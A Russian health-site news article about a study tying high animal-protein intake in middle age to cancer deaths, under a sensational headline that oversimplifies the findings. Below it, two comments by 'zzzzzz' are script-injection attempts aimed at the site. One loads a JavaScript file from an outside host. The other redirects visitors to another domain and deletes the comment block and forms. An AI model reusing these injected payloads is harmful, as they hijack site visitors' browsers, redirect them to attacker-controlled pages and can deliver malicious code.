Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Стоит ли есть мясо? Хотит...  >>  Стоит ли есть мясо? Хотите ли вы получить рак или нет?
 
Обратная связь
 

Стоит ли есть мясо? Хотите ли вы получить рак или нет?

Размер шрифта
23 сентября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Высокобелковые диеты приобретают все большую популярность и уже имеют множество последователей. Однако ученые в последнее время выступают против такого режима питания: как оказалось, он может увеличить ваши шансы умереть от рака. Но это не относится к тем, кто старше 65 – по мнению ученых, для них высокое потребление белка как раз полезно и даже помогает бороться со старением.

Стоит ли есть мясо? Хотите ли вы получить рак или нет?

В исследовании приняли участие 6 000 человек от пятидесяти и старше, за которыми проводилось наблюдение в течение 18 лет. Ученые обнаружили, что люди в возрасте от 50 до 65 лет, в рационе которых в зрелом возрасте присутствовало много животных белков, в четыре раза чаще умирали от рака за время исследования, чем те, кто употреблял меньше белка.

«Многие популярные диеты имеют в своем составе большое количество белков и малое – углеводов. Они помогают терять вес, однако такая диета вовсе не способствует долголетию», – заявляет Вальтер Лонго, профессор биологии из Университета Южной Калифорнии. Вред от таких диет сравним даже с вредным влиянием курения: по словам профессора Лонго, курильщики имеют в четыре раза большие шансов умереть от рака, чем некурящие.

Исследование также показало, что люди зрелого возраста, которые употребляли продукты, богатые животными белками, включая мясо, молоко и сыр, имели на 75% большую вероятность умереть от каких-либо медицинских причин. Ученые дали определение высокобелковой диеты: это получение как минимум 20% суточного количества калорий из белков. Если белки служат источником 10-19% нормы калорий, то это диета с умеренным содержанием белка, менее 10% – низкобелковая диета.

Однако что вредно в одном возрасте, то может быть полезно в другом. Согласно полученным данным, люди старше 65 лет имели меньше шансов умереть от рака или каких-либо других причин, если употребляли больше белка. «Так что не всем людям полезно питание с низким содержанием белка. Пожилые люди определенно выигрывали от более высокого его количества в рационе», – говорит Лонго. Достаточное количество белка в рационе таких людей важно для поддержания здорового веса и защиты от старения.

Связь между высокобелковой диетой и риском развития рака практически отсутствует, если в рацион питаниявходят в основном растительные источники белка, такие как бобы. Причина может быть в том, что растительные белки имеют другую структуру и потому не стимулируют гормоны роста так же эффективно, как животные.

Ученые предполагают, что средиземноморская диета, в которой мало белков и много углеводов, является наилучшим выбором для достижения долголетия. Они рекомендуют употреблять в пищу в зрелом возрасте около 0,8 грамм белка на килограмм массы тела в день. Причем предпочтение следует отдавать растительным белкам.

Чтобы определить причины зависимости между употреблением белка и развитием рака, исследователи ввели в организм мышей клетки рака кожи. Было показано, что высокое количество белков в рационе мыши способствовало росту опухоли благодаря повышению уровня гормона роста (инсулиноподобного фактора роста 1). Ученые измерили уровень этого фактора роста у 2 000 человек, выбранных случайным образом из участников исследования. Было выявлено, что каждое повышение его количества на 10 нг/мл, повышало риск смерти от рака на 9% у людей из группы высокобелковой диеты в сравнении с низкобелковой. «Когда вы употребляете много белка, количество этого фактора роста повышается, а он, в свою очередь, способствует превращению нормальных клеток в злокачественные и их дальнейшему росту», – рассказывает Лонго.

Так что если хотите долго жить – не увлекайтесь белковыми диетами, разнообразьте свой рацион и другими полезными и не менее вкусными продуктами. Да и переход на средиземноморский рацион питания– отличный вариант.

Все о раке – в нашем специальном проекте.

Результаты этой работы были опубликованы в журнале CellMetabolism.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:28

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет   На что слетаются мухи? Оказывается, на рак!   Простое рукопожатие покажет, есть у вас рак или нет!  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Что можно и чего нельзя с изжогой?
Бронхит: лицом к лицу
Еда против рака. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.